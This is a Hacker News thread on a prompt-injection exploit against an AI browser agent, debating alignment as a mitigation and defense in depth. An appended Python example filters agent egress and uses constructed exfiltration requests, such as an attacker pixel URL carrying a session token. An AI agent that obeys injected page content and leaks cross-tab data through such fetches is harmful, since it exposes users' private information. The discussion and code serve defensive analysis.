
645 points by helloplanets | 5 comments
ec109685 No.45005397
It’s obviously fundamentally unsafe when Google, OpenAI and Anthropic haven’t released the same feature and instead use a locked down VM with no cookies to browse the web.

LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.

replies(7): >>45005444 #>>45005853 #>>45006130 #>>45006210 #>>45006263 #>>45006384 #>>45006571 #
skaul No.45006130
(I lead privacy at Brave and am one of the authors)

> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

No, we never claimed or believe that those will be enough. Those are just easy things that browser vendors should be doing, and would have prevented this simple attack. These are necessary, not sufficient.

replies(4): >>45006255 #>>45006329 #>>45006467 #>>45006601 #
cowboylowrez No.45006255
What you're saying is that the described step, "model alignment", is necessary even though it will fail a percentage of the time. Whenever I see something that is "necessary" but doesn't have like a dozen 9's for reliability against failure or something, well, let's make that not necessary then. Whadya say?
replies(1): >>45006309 #
skaul No.45006309
That's not how defense-in-depth works. If a security mitigation catches 90% of the "easy" attacks, that's worth doing, especially when trying to give users an extremely powerful capability. It just shouldn't be the only security measure you're taking.
replies(2): >>45006450 #>>45006710 #
1. MattPalmer1086 No.45006710
Defence in depth means you have more than one security control. But the LLM cannot be regarded as a security control in the first place; it's the thing you are trying to defend against.

If you tried to cast an unreliable insider as part of your defence in depth strategy (because they aren't totally unreliable), you would be laughed out of the room in any security group I've ever worked with.

replies(2): >>45006834 #>>45011038 #
2. cowboylowrez No.45006834
call it "vibe security" lol
replies(1): >>45006928 #
3. MattPalmer1086 No.45006928
Haha, like it!
4. kbrkbr No.45011038
I am sure that's what you mean, but I think it is important to state it explicitly every now and then:

> Defence in depth means you have more than one security control

that overlap. Having them strictly parallel is not defense in depth (e.g. on one door to the same room a dog, and on a different unconnected door a guard).

replies(1): >>45011181 #
5. MattPalmer1086 No.45011181
Yes, fully agree. Should have made that explicit. And also different types of control too.

So you might have a lock on the door, a dog, and a pressure sensor on the floor after it...
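An added illustration of two points made in this thread, written for this page rather than taken from Brave's post or from any browser vendor's code: ec109685's remark that "drop privileges" alone leaves a plain image fetch to an attacker-controlled URL as an exfiltration channel, and the later exchange about defense in depth requiring overlapping controls of different types. The `AgentRequest` and `EgressPolicy` names, the origins, and the session token value are all constructed for the example; a real agent would hook its network layer at the point where page-derived instructions turn into outbound requests.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample: a value the agent could have seen in another (private) tab.
SENSITIVE_VALUES = {"sessionid=CONSTRUCTED-TOKEN-123"}


@dataclass
class AgentRequest:
    url: str
    kind: str           # "navigate", "image", "xhr", "send_email"
    initiated_by: str   # "user" (explicit instruction/click) or "page" (derived from page content)


def privilege_drop_only(req: AgentRequest) -> tuple[str, str]:
    """The single mitigation the thread calls insufficient: only gate high-privilege actions.

    It says nothing about ordinary fetches, so a page-triggered image load goes through.
    """
    if req.kind == "send_email" and req.initiated_by == "page":
        return "deny", "page content may not trigger send_email"
    return "allow", "not a privileged action"


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


@dataclass
class EgressPolicy:
    """Overlapping controls on the same channel: privilege gate, origin allowlist, content check."""
    allowed_origins: set
    sensitive_values: set = field(default_factory=set)
    max_query_len: int = 256

    def decide(self, req: AgentRequest) -> tuple[str, str]:
        # Control 1: the privilege gate from above still applies.
        verdict, reason = privilege_drop_only(req)
        if verdict == "deny":
            return verdict, reason
        parts = urlsplit(req.url)
        if parts.scheme not in ("http", "https"):
            return "deny", f"unsupported scheme {parts.scheme!r}"
        # Control 2: requests that page content caused may only reach allowlisted origins.
        if req.initiated_by == "page" and origin_of(req.url) not in self.allowed_origins:
            return "deny", f"page-initiated {req.kind} to non-allowlisted origin {origin_of(req.url)}"
        # Control 3: even on an allowlisted origin, the URL itself must not carry private tab data
        # (path, query and fragment can all smuggle it, so the whole URL is checked).
        for secret in self.sensitive_values:
            if secret in req.url:
                return "deny", "URL contains a value taken from private tab data"
        if len(parts.query) > self.max_query_len:
            return "deny", f"query string of {len(parts.query)} bytes exceeds limit"
        return "allow", "origin allowlisted and no sensitive data in URL"


# Constructed policy: the only origin page content may cause fetches to is the shop being browsed.
FULL_POLICY = EgressPolicy(allowed_origins={"https://shop.example"}, sensitive_values=SENSITIVE_VALUES)

# Constructed requests: one benign user navigation, one benign page asset, two leak attempts.
SAMPLE_REQUESTS = {
    "user_nav": AgentRequest("https://shop.example/cart", "navigate", "user"),
    "page_logo": AgentRequest("https://shop.example/logo.png", "image", "page"),
    "page_email": AgentRequest("https://mail.example/compose", "send_email", "page"),
    "page_pixel": AgentRequest("https://attacker.example/pixel.png?d=sessionid=CONSTRUCTED-TOKEN-123", "image", "page"),
    "page_same_origin_leak": AgentRequest("https://shop.example/track?ref=sessionid=CONSTRUCTED-TOKEN-123", "image", "page"),
}


def compare() -> dict:
    """Return {name: (privilege-drop verdict, full-policy verdict)} for the sample requests."""
    return {name: (privilege_drop_only(r)[0], FULL_POLICY.decide(r)[0]) for name, r in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, (drop_only, full) in compare().items():
        print(f"{name:24s} privilege-drop-only={drop_only:5s} full-policy={full}")
```

The "page_pixel" row is the case from the first comment: the privilege gate allows it because an image load is not a privileged action, while the allowlist stops it. The "page_same_origin_leak" row shows why the controls need to overlap rather than sit side by side: the allowlist passes it, and only the content check catches the token in the URL.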